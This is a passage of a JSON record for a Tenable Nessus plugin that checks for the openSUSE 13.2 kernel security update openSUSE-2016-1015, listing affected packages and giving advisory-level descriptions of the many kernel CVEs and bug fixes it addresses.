"CVE-2015-8785", "CVE-2015-8812", "CVE-2015-8816", "CVE-2015-8830", "CVE-2016-0758", "CVE-2016-1583", "CVE-2016-2053", "CVE-2016-2184", "CVE-2016-2185", "CVE-2016-2186", "CVE-2016-2187", "CVE-2016-2188", "CVE-2016-2384", "CVE-2016-2543", "CVE-2016-2544", "CVE-2016-2545", "CVE-2016-2546", "CVE-2016-2547", "CVE-2016-2548", "CVE-2016-2549", "CVE-2016-2782", "CVE-2016-2847", "CVE-2016-3134", "CVE-2016-3136", "CVE-2016-3137", "CVE-2016-3138", "CVE-2016-3139", "CVE-2016-3140", "CVE-2016-3156", "CVE-2016-3672", "CVE-2016-3689", "CVE-2016-3951", "CVE-2016-4470", "CVE-2016-4482", "CVE-2016-4485", "CVE-2016-4486", "CVE-2016-4565", "CVE-2016-4569", "CVE-2016-4578", "CVE-2016-4580", "CVE-2016-4581", "CVE-2016-4805", "CVE-2016-4913", "CVE-2016-4997", "CVE-2016-5244", "CVE-2016-5829"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bbswitch", "p-cpe:/a:novell:opensuse:bbswitch-debugsource", "p-cpe:/a:novell:opensuse:bbswitch-kmp-default", "p-cpe:/a:novell:opensuse:bbswitch-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:bbswitch-kmp-desktop", "p-cpe:/a:novell:opensuse:bbswitch-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:bbswitch-kmp-pae", "p-cpe:/a:novell:opensuse:bbswitch-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:bbswitch-kmp-xen", "p-cpe:/a:novell:opensuse:cloop", "p-cpe:/a:novell:opensuse:bbswitch-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:cloop-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:cloop-kmp-pae", "p-cpe:/a:novell:opensuse:cloop-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:cloop-debuginfo", "p-cpe:/a:novell:opensuse:cloop-kmp-xen", "p-cpe:/a:novell:opensuse:cloop-debugsource", "p-cpe:/a:novell:opensuse:cloop-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:cloop-kmp-default", "p-cpe:/a:novell:opensuse:crash", "p-cpe:/a:novell:opensuse:crash-debuginfo", "p-cpe:/a:novell:opensuse:cloop-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:crash-debugsource", "p-cpe:/a:novell:opensuse:cloop-kmp-desktop", "p-cpe:/a:novell:opensuse:crash-devel", "p-cpe:/a:novell:opensuse:hdjmod-kmp-desktop", "p-cpe:/a:novell:opensuse:crash-eppic", "p-cpe:/a:novell:opensuse:crash-eppic-debuginfo", "p-cpe:/a:novell:opensuse:hdjmod-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:crash-gcore", "p-cpe:/a:novell:opensuse:crash-gcore-debuginfo", "p-cpe:/a:novell:opensuse:hdjmod-kmp-pae", "p-cpe:/a:novell:opensuse:crash-kmp-default", "p-cpe:/a:novell:opensuse:crash-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:hdjmod-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:crash-kmp-desktop", "p-cpe:/a:novell:opensuse:hdjmod-kmp-xen", "p-cpe:/a:novell:opensuse:crash-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:crash-kmp-pae", "p-cpe:/a:novell:opensuse:crash-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:crash-kmp-xen", "p-cpe:/a:novell:opensuse:crash-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:hdjmod-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:hdjmod-debugsource", "p-cpe:/a:novell:opensuse:ipset", "p-cpe:/a:novell:opensuse:hdjmod-kmp-default", "p-cpe:/a:novell:opensuse:ipset-debuginfo", "p-cpe:/a:novell:opensuse:hdjmod-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:ipset-debugsource", "p-cpe:/a:novell:opensuse:kernel-xen-base", "p-cpe:/a:novell:opensuse:kernel-xen-base-debuginfo", "p-cpe:/a:novell:opensuse:ipset-devel", "p-cpe:/a:novell:opensuse:kernel-xen-debuginfo", "p-cpe:/a:novell:opensuse:ipset-kmp-default", "p-cpe:/a:novell:opensuse:kernel-xen-debugsource", "p-cpe:/a:novell:opensuse:ipset-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-xen-devel", "p-cpe:/a:novell:opensuse:libipset3", "p-cpe:/a:novell:opensuse:ipset-kmp-desktop", "p-cpe:/a:novell:opensuse:libipset3-debuginfo", "p-cpe:/a:novell:opensuse:ipset-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:pcfclock", "p-cpe:/a:novell:opensuse:ipset-kmp-pae", "p-cpe:/a:novell:opensuse:ipset-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:pcfclock-debuginfo", "p-cpe:/a:novell:opensuse:pcfclock-debugsource", "p-cpe:/a:novell:opensuse:pcfclock-kmp-default", "p-cpe:/a:novell:opensuse:pcfclock-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:pcfclock-kmp-desktop", "p-cpe:/a:novell:opensuse:ipset-kmp-xen", "p-cpe:/a:novell:opensuse:pcfclock-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:ipset-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:pcfclock-kmp-pae", "p-cpe:/a:novell:opensuse:kernel-debug", "p-cpe:/a:novell:opensuse:pcfclock-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-base", "p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-debuginfo", "p-cpe:/a:novell:opensuse:python-virtualbox", "p-cpe:/a:novell:opensuse:kernel-debug-debugsource", "p-cpe:/a:novell:opensuse:python-virtualbox-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-devel", "p-cpe:/a:novell:opensuse:vhba-kmp-debugsource", "p-cpe:/a:novell:opensuse:vhba-kmp-default", "p-cpe:/a:novell:opensuse:vhba-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo", "p-cpe:/a:novell:opensuse:vhba-kmp-desktop", "p-cpe:/a:novell:opensuse:kernel-default", "p-cpe:/a:novell:opensuse:vhba-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:vhba-kmp-pae", "p-cpe:/a:novell:opensuse:vhba-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-base", "p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo", "p-cpe:/a:novell:opensuse:vhba-kmp-xen", "p-cpe:/a:novell:opensuse:kernel-default-debuginfo", "p-cpe:/a:novell:opensuse:vhba-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-debugsource", "p-cpe:/a:novell:opensuse:virtualbox", "p-cpe:/a:novell:opensuse:kernel-default-devel", "p-cpe:/a:novell:opensuse:virtualbox-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop", "p-cpe:/a:novell:opensuse:virtualbox-debugsource", "p-cpe:/a:novell:opensuse:kernel-desktop-base", "p-cpe:/a:novell:opensuse:virtualbox-devel", "p-cpe:/a:novell:opensuse:kernel-desktop-base-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-desktop-icons", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default", "p-cpe:/a:novell:opensuse:kernel-desktop-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-debugsource", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-desktop", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-pae", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-tools", "p-cpe:/a:novell:opensuse:kernel-desktop-devel", "p-cpe:/a:novell:opensuse:virtualbox-guest-tools-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-x11", "p-cpe:/a:novell:opensuse:kernel-devel", "p-cpe:/a:novell:opensuse:virtualbox-guest-x11-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default", "p-cpe:/a:novell:opensuse:kernel-ec2-base", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-desktop", "p-cpe:/a:novell:opensuse:kernel-ec2-base-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-pae", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-debugsource", "p-cpe:/a:novell:opensuse:virtualbox-host-source", "p-cpe:/a:novell:opensuse:kernel-ec2-devel", "p-cpe:/a:novell:opensuse:virtualbox-qt", "p-cpe:/a:novell:opensuse:kernel-macros", "p-cpe:/a:novell:opensuse:virtualbox-qt-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-websrv", "p-cpe:/a:novell:opensuse:kernel-obs-build", "p-cpe:/a:novell:opensuse:virtualbox-websrv-debuginfo", "p-cpe:/a:novell:opensuse:kernel-obs-build-debugsource", "p-cpe:/a:novell:opensuse:xen", "p-cpe:/a:novell:opensuse:xen-debugsource", "p-cpe:/a:novell:opensuse:kernel-obs-qa", "p-cpe:/a:novell:opensuse:xen-devel", "p-cpe:/a:novell:opensuse:kernel-obs-qa-xen", "p-cpe:/a:novell:opensuse:xen-doc-html", "p-cpe:/a:novell:opensuse:xen-kmp-default", "p-cpe:/a:novell:opensuse:kernel-pae", "p-cpe:/a:novell:opensuse:xen-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:xen-kmp-desktop", "p-cpe:/a:novell:opensuse:kernel-pae-base", "p-cpe:/a:novell:opensuse:xen-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-base-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs", "p-cpe:/a:novell:opensuse:kernel-pae-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs-32bit", "p-cpe:/a:novell:opensuse:kernel-pae-debugsource", "p-cpe:/a:novell:opensuse:xen-libs-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs-debuginfo-32bit", "p-cpe:/a:novell:opensuse:kernel-pae-devel", "p-cpe:/a:novell:opensuse:xen-tools", "p-cpe:/a:novell:opensuse:xen-tools-debuginfo", "p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:xen-tools-domu", "p-cpe:/a:novell:opensuse:kernel-source-vanilla", "p-cpe:/a:novell:opensuse:xen-tools-domu-debuginfo", "p-cpe:/a:novell:opensuse:xtables-addons", "p-cpe:/a:novell:opensuse:xtables-addons-debuginfo", "p-cpe:/a:novell:opensuse:xtables-addons-debugsource", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-default", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-desktop", "p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-pae", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-xen", "p-cpe:/a:novell:opensuse:kernel-xen", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-xen-debuginfo", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2016-1015.NASL", "href": "https://www.tenable.com/plugins/nessus/93104", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-1015.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93104);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-6701\", \"CVE-2013-7446\", \"CVE-2014-9904\", \"CVE-2015-3288\", \"CVE-2015-6526\", \"CVE-2015-7566\", \"CVE-2015-8709\", \"CVE-2015-8785\", \"CVE-2015-8812\", \"CVE-2015-8816\", \"CVE-2015-8830\", \"CVE-2016-0758\", \"CVE-2016-1583\", \"CVE-2016-2053\", \"CVE-2016-2184\", \"CVE-2016-2185\", \"CVE-2016-2186\", \"CVE-2016-2187\", \"CVE-2016-2188\", \"CVE-2016-2384\", \"CVE-2016-2543\", \"CVE-2016-2544\", \"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2016-2547\", \"CVE-2016-2548\", \"CVE-2016-2549\", \"CVE-2016-2782\", \"CVE-2016-2847\", \"CVE-2016-3134\", \"CVE-2016-3136\", \"CVE-2016-3137\", \"CVE-2016-3138\", \"CVE-2016-3139\", \"CVE-2016-3140\", \"CVE-2016-3156\", \"CVE-2016-3672\", \"CVE-2016-3689\", \"CVE-2016-3951\", \"CVE-2016-4470\", \"CVE-2016-4482\", \"CVE-2016-4485\", \"CVE-2016-4486\", \"CVE-2016-4565\", \"CVE-2016-4569\", \"CVE-2016-4578\", \"CVE-2016-4580\", \"CVE-2016-4581\", \"CVE-2016-4805\", \"CVE-2016-4913\", \"CVE-2016-4997\", \"CVE-2016-5244\", \"CVE-2016-5829\");\n\n script_name(english:\"openSUSE Security Update : the Linux Kernel (openSUSE-2016-1015)\");\n script_summary(english:\"Check for the openSUSE-2016-1015 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The openSUSE 13.2 kernel was updated to fix various bugs and security\nissues.\n\nThe following security bugs were fixed :\n\n - CVE-2016-1583: Prevent the usage of mmap when the lower\n file system does not allow it. This could have lead to\n local privilege escalation when ecryptfs-utils was\n installed and /sbin/mount.ecryptfs_private was setuid\n (bsc#983143).\n\n - CVE-2016-4913: The get_rock_ridge_filename function in\n fs/isofs/rock.c in the Linux kernel mishandles NM (aka\n alternate name) entries containing \\0 characters, which\n allowed local users to obtain sensitive information from\n kernel memory or possibly have unspecified other impact\n via a crafted isofs filesystem (bnc#980725).\n\n - CVE-2016-4580: The x25_negotiate_facilities function in\n net/x25/x25_facilities.c in the Linux kernel did not\n properly initialize a certain data structure, which\n allowed attackers to obtain sensitive information from\n kernel stack memory via an X.25 Call Request\n (bnc#981267).\n\n - CVE-2016-0758: Tags with indefinite length could have\n corrupted pointers in asn1_find_indefinite_length\n (bsc#979867).\n\n - CVE-2016-2053: The asn1_ber_decoder function in\n lib/asn1_decoder.c in the Linux kernel allowed attackers\n to cause a denial of service (panic) via an ASN.1 BER\n file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bnc#963762).\n\n - CVE-2016-2187: The gtco_probe function in\n drivers/input/tablet/gtco.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and system crash) via\n a crafted endpoints value in a USB device descriptor\n (bnc#971919 971944).\n\n - CVE-2016-4482: The proc_connectinfo function in\n drivers/usb/core/devio.c in the Linux kernel did not\n initialize a certain data structure, which allowed local\n users to obtain sensitive information from kernel stack\n memory via a crafted USBDEVFS_CONNECTINFO ioctl call\n (bnc#978401 bsc#978445).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the\n Linux kernel incorrectly relies on the write system\n call, which allowed local users to cause a denial of\n service (kernel memory write operation) or possibly have\n unspecified other impact via a uAPI interface\n (bnc#979548 bsc#980363).\n\n - CVE-2016-3672: The arch_pick_mmap_layout function in\n arch/x86/mm/mmap.c in the Linux kernel did not properly\n randomize the legacy base address, which made it easier\n for local users to defeat the intended restrictions on\n the ADDR_NO_RANDOMIZE flag, and bypass the ASLR\n protection mechanism for a setuid or setgid program, by\n disabling stack-consumption resource limits\n (bnc#974308).\n\n - CVE-2016-4581: fs/pnode.c in the Linux kernel did not\n properly traverse a mount propagation tree in a certain\n case involving a slave mount, which allowed local users\n to cause a denial of service (NULL pointer dereference\n and OOPS) via a crafted series of mount system calls\n (bnc#979913).\n\n - CVE-2016-4485: The llc_cmsg_rcv function in\n net/llc/af_llc.c in the Linux kernel did not initialize\n a certain data structure, which allowed attackers to\n obtain sensitive information from kernel stack memory by\n reading a message (bnc#978821).\n\n - CVE-2015-3288: A security flaw was found in the Linux\n kernel that there was a way to arbitrary change zero\n page memory. (bnc#979021).\n\n - CVE-2016-4578: sound/core/timer.c in the Linux kernel\n did not initialize certain r1 data structures, which\n allowed local users to obtain sensitive information from\n kernel stack memory via crafted use of the ALSA timer\n interface, related to the (1) snd_timer_user_ccallback\n and (2) snd_timer_user_tinterrupt functions\n (bnc#979879).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux\n kernel did not validate certain offset fields, which\n allowed local users to gain privileges or cause a denial\n of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bnc#971126).\n\n - CVE-2016-4486: The rtnl_fill_link_ifmap function in\n net/core/rtnetlink.c in the Linux kernel did not\n initialize a certain data structure, which allowed local\n users to obtain sensitive information from kernel stack\n memory by reading a Netlink message (bnc#978822).\n\n - CVE-2013-7446: Use-after-free vulnerability in\n net/unix/af_unix.c in the Linux kernel allowed local\n users to bypass intended AF_UNIX socket permissions or\n cause a denial of service (panic) via crafted epoll_ctl\n calls (bnc#955654).\n\n - CVE-2016-4569: The snd_timer_user_params function in\n sound/core/timer.c in the Linux kernel did not\n initialize a certain data structure, which allowed local\n users to obtain sensitive information from kernel stack\n memory via crafted use of the ALSA timer interface\n (bnc#979213).\n\n - CVE-2016-2847: fs/pipe.c in the Linux kernel did not\n limit the amount of unread data in pipes, which allowed\n local users to cause a denial of service (memory\n consumption) by creating many pipes with non-default\n sizes (bnc#970948 974646).\n\n - CVE-2016-3136: The mct_u232_msr_to_state function in\n drivers/usb/serial/mct_u232.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted USB device without two interrupt-in\n endpoint descriptors (bnc#970955).\n\n - CVE-2016-2188: The iowarrior_probe function in\n drivers/usb/misc/iowarrior.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and system crash) via\n a crafted endpoints value in a USB device descriptor\n (bnc#970956).\n\n - CVE-2016-3138: The acm_probe function in\n drivers/usb/class/cdc-acm.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and system crash) via\n a USB device without both a control and a data endpoint\n descriptor (bnc#970911).\n\n - CVE-2016-3137: drivers/usb/serial/cypress_m8.c in the\n Linux kernel allowed physically proximate attackers to\n cause a denial of service (NULL pointer dereference and\n system crash) via a USB device without both an\n interrupt-in and an interrupt-out endpoint descriptor,\n related to the cypress_generic_port_probe and\n cypress_open functions (bnc#970970).\n\n - CVE-2016-3951: Double free vulnerability in\n drivers/net/usb/cdc_ncm.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (system crash) or possibly have unspecified\n other impact by inserting a USB device with an invalid\n USB descriptor (bnc#974418).\n\n - CVE-2016-3140: The digi_port_init function in\n drivers/usb/serial/digi_acceleport.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted endpoints value in a USB device descriptor\n (bnc#970892).\n\n - CVE-2016-2186: The powermate_probe function in\n drivers/input/misc/powermate.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted endpoints value in a USB device descriptor\n (bnc#970958).\n\n - CVE-2016-2185: The ati_remote2_probe function in\n drivers/input/misc/ati_remote2.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted endpoints value in a USB device descriptor\n (bnc#971124).\n\n - CVE-2016-3689: The ims_pcu_parse_cdc_data function in\n drivers/input/misc/ims-pcu.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (system crash) via a USB device without both a\n master and a slave interface (bnc#971628).\n\n - CVE-2016-3156: The IPv4 implementation in the Linux\n kernel mishandles destruction of device objects, which\n allowed guest OS users to cause a denial of service\n (host OS networking outage) by arranging for a large\n number of IP addresses (bnc#971360).\n\n - CVE-2016-2184: The create_fixed_stream_quirk function in\n sound/usb/quirks.c in the snd-usb-audio driver in the\n Linux kernel allowed physically proximate attackers to\n cause a denial of service (NULL pointer dereference or\n double free, and system crash) via a crafted endpoints\n value in a USB device descriptor (bnc#971125).\n\n - CVE-2016-3139: The wacom_probe function in\n drivers/input/tablet/wacom_sys.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted endpoints value in a USB device descriptor\n (bnc#970909).\n\n - CVE-2015-8830: Integer overflow in the\n aio_setup_single_vector function in fs/aio.c in the\n Linux kernel 4.0 allowed local users to cause a denial\n of service or possibly have unspecified other impact via\n a large AIO iovec. NOTE: this vulnerability exists\n because of a CVE-2012-6701 regression (bnc#969354\n bsc#969355).\n\n - CVE-2016-2782: The treo_attach function in\n drivers/usb/serial/visor.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and system crash) or\n possibly have unspecified other impact by inserting a\n USB device that lacks a (1) bulk-in or (2) interrupt-in\n endpoint (bnc#968670).\n\n - CVE-2015-8816: The hub_activate function in\n drivers/usb/core/hub.c in the Linux kernel did not\n properly maintain a hub-interface data structure, which\n allowed physically proximate attackers to cause a denial\n of service (invalid memory access and system crash) or\n possibly have unspecified other impact by unplugging a\n USB hub device (bnc#968010).\n\n - CVE-2015-7566: The clie_5_attach function in\n drivers/usb/serial/visor.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and system crash) or\n possibly have unspecified other impact by inserting a\n USB device that lacks a bulk-out endpoint (bnc#961512).\n\n - CVE-2016-2549: sound/core/hrtimer.c in the Linux kernel\n did not prevent recursive callback access, which allowed\n local users to cause a denial of service (deadlock) via\n a crafted ioctl call (bnc#968013).\n\n - CVE-2016-2547: sound/core/timer.c in the Linux kernel\n employs a locking approach that did not consider slave\n timer instances, which allowed local users to cause a\n denial of service (race condition, use-after-free, and\n system crash) via a crafted ioctl call (bnc#968011).\n\n - CVE-2016-2548: sound/core/timer.c in the Linux kernel\n retains certain linked lists after a close or stop\n action, which allowed local users to cause a denial of\n service (system crash) via a crafted ioctl call, related\n to the (1) snd_timer_close and (2) _snd_timer_stop\n functions (bnc#968012).\n\n - CVE-2016-2546: sound/core/timer.c in the Linux kernel\n uses an incorrect type of mutex, which allowed local\n users to cause a denial of service (race condition,\n use-after-free, and system crash) via a crafted ioctl\n call (bnc#967975).\n\n - CVE-2016-2545: The snd_timer_interrupt function in\n sound/core/timer.c in the Linux kernel did not properly\n maintain a certain linked list, which allowed local\n users to cause a denial of service (race condition and\n system crash) via a crafted ioctl call (bnc#967974).\n\n - CVE-2016-2544: Race condition in the queue_delete\n function in sound/core/seq/seq_queue.c in the Linux\n kernel allowed local users to cause a denial of service\n (use-after-free and system crash) by making an ioctl\n call at a certain time (bnc#967973).\n\n - CVE-2016-2543: The snd_seq_ioctl_remove_events function\n in sound/core/seq/seq_clientmgr.c in the Linux kernel\n did not verify FIFO assignment before proceeding with\n FIFO clearing, which allowed local users to cause a\n denial of service (NULL pointer dereference and OOPS)\n via a crafted ioctl call (bnc#967972).\n\n - CVE-2015-8709: ** DISPUTED ** kernel/ptrace.c in the\n Linux kernel mishandles uid and gid mappings, which\n allowed local users to gain privileges by establishing a\n user namespace, waiting for a root process to enter that\n namespace with an unsafe uid or gid, and then using the\n ptrace system call. NOTE: the vendor states 'there is no\n kernel bug here (bnc#959709 960561 ).\n\n - CVE-2015-8812: drivers/infiniband/hw/cxgb3/iwch_cm.c in\n the Linux kernel did not properly identify error\n conditions, which allowed remote attackers to execute\n arbitrary code or cause a denial of service\n (use-after-free) via crafted packets (bnc#966437).\n\n - CVE-2016-2384: Double free vulnerability in the\n snd_usbmidi_create function in sound/usb/midi.c in the\n Linux kernel allowed physically proximate attackers to\n cause a denial of service (panic) or possibly have\n unspecified other impact via vectors involving an\n invalid USB descriptor (bnc#966693).\n\n - CVE-2015-8785: The fuse_fill_write_pages function in\n fs/fuse/file.c in the Linux kernel allowed local users\n to cause a denial of service (infinite loop) via a\n writev system call that triggers a zero length for the\n first segment of an iov (bnc#963765).\n\n - CVE-2014-9904: The snd_compress_check_input function in\n sound/core/compress_offload.c in the ALSA subsystem in\n the Linux kernel did not properly check for an integer\n overflow, which allowed local users to cause a denial of\n service (insufficient memory allocation) or possibly\n have unspecified other impact via a crafted\n SNDRV_COMPRESS_SET_PARAMS ioctl call (bnc#986811).\n\n - CVE-2016-5829: Multiple heap-based buffer overflows in\n the hiddev_ioctl_usage function in\n drivers/hid/usbhid/hiddev.c in the Linux kernel allow\n local users to cause a denial of service or possibly\n have unspecified other impact via a crafted (1)\n HIDIOCGUSAGES or (2) HIDIOCSUSAGES ioctl call\n (bnc#986572 986573).\n\n - CVE-2016-4997: The compat IPT_SO_SET_REPLACE setsockopt\n implementation in the netfilter subsystem in the Linux\n kernel allowed local users to gain privileges or cause a\n denial of service (memory corruption) by leveraging\n in-container root access to provide a crafted offset\n value that triggers an unintended decrement (bnc#986362\n 986365 986377).\n\n - CVE-2016-4805: Use-after-free vulnerability in\n drivers/net/ppp/ppp_generic.c in the Linux kernel\n allowed local users to cause a denial of service (memory\n corruption and system crash, or spinlock) or possibly\n have unspecified other impact by removing a network\n namespace, related to the ppp_register_net_channel and\n ppp_unregister_channel functions (bnc#980371).\n\n - CVE-2016-4470: The key_reject_and_link function in\n security/keys/key.c in the Linux kernel did not ensure\n that a certain data structure is initialized, which\n allowed local users to cause a denial of service (system\n crash) via vectors involving a crafted keyctl request2\n command (bnc#984755 984764).\n\n - CVE-2015-6526: The perf_callchain_user_64 function in\n arch/powerpc/perf/callchain.c in the Linux kernel on\n ppc64 platforms allowed local users to cause a denial of\n service (infinite loop) via a deep 64-bit userspace\n backtrace (bnc#942702).\n\n - CVE-2016-5244: The rds_inc_info_copy function in\n net/rds/recv.c in the Linux kernel did not initialize a\n certain structure member, which allowed remote attackers\n to obtain sensitive information from kernel stack memory\n by reading an RDS message (bnc#983213).\n\nThe following non-security bugs were fixed :\n\n - ALSA: hrtimer: Handle start/stop more properly\n (bsc#973378).\n\n - ALSA: pcm: Fix potential deadlock in OSS emulation\n (bsc#968018).\n\n - ALSA: rawmidi: Fix race at copying & updating the\n position (bsc#968018).\n\n - ALSA: rawmidi: Make snd_rawmidi_transmit() race-free\n (bsc#968018).\n\n - ALSA: seq: Fix double port list deletion (bsc#968018).\n\n - ALSA: seq: Fix incorrect sanity check at\n snd_seq_oss_synth_cleanup() (bsc#968018).\n\n - ALSA: seq: Fix leak of pool buffer at concurrent writes\n (bsc#968018).\n\n - ALSA: seq: Fix lockdep warnings due to double mutex\n locks (bsc#968018).\n\n - ALSA: seq: Fix race at closing in virmidi driver\n (bsc#968018).\n\n - ALSA: seq: Fix yet another races among ALSA timer\n accesses (bsc#968018).\n\n - ALSA: timer: Call notifier in the same spinlock\n (bsc#973378).\n\n - ALSA: timer: Code cleanup (bsc#968018).\n\n - ALSA: timer: Fix leftover link at closing (bsc#968018).\n\n - ALSA: timer: Fix link corruption due to double start or\n stop (bsc#968018).\n\n - ALSA: timer: Fix race between stop and interrupt\n (bsc#968018).\n\n - ALSA: timer: Fix wrong instance passed to slave\n callbacks (bsc#968018).\n\n - ALSA: timer: Protect the whole snd_timer_close() with\n open race (bsc#973378).\n\n - ALSA: timer: Sync timer deletion at closing the system\n timer (bsc#973378).\n\n - ALSA: timer: Use mod_timer() for rearming the system\n timer (bsc#973378).\n\n - Bluetooth: vhci: Fix race at creating hci device\n (bsc#971799,bsc#966849).\n\n - Bluetooth: vhci: fix open_timeout vs. hdev race\n (bsc#971799,bsc#966849).\n\n - Bluetooth: vhci: purge unhandled skbs\n (bsc#971799,bsc#966849).\n\n - Btrfs: do not use src fd for printk (bsc#980348).\n\n - Refresh\n patches.drivers/ALSA-hrtimer-Handle-start-stop-more-prop\n erly. Fix the build error on 32bit architectures.\n\n - Refresh patches.xen/xen-netback-coalesce: Restore\n copying of SKBs with head exceeding page size\n (bsc#978469).\n\n - Refresh patches.xen/xen3-patch-3.14: Suppress atomic\n file position updates on /proc/xen/xenbus (bsc#970275).\n\n - Subject: [PATCH] USB: xhci: Add broken streams quirk for\n Frescologic device id 1009 (bnc#982706).\n\n - USB: usbip: fix potential out-of-bounds write\n (bnc#975945).\n\n - af_unix: Guard against other == sk in unix_dgram_sendmsg\n (bsc#973570).\n\n - backends: guarantee one time reads of shared ring\n contents (bsc#957988).\n\n - btrfs: do not go readonly on existing qgroup items\n (bsc#957052).\n\n - btrfs: remove error message from search ioctl for\n nonexistent tree.\n\n - drm/i915: Fix missing backlight update during panel\n disablement (bsc#941113 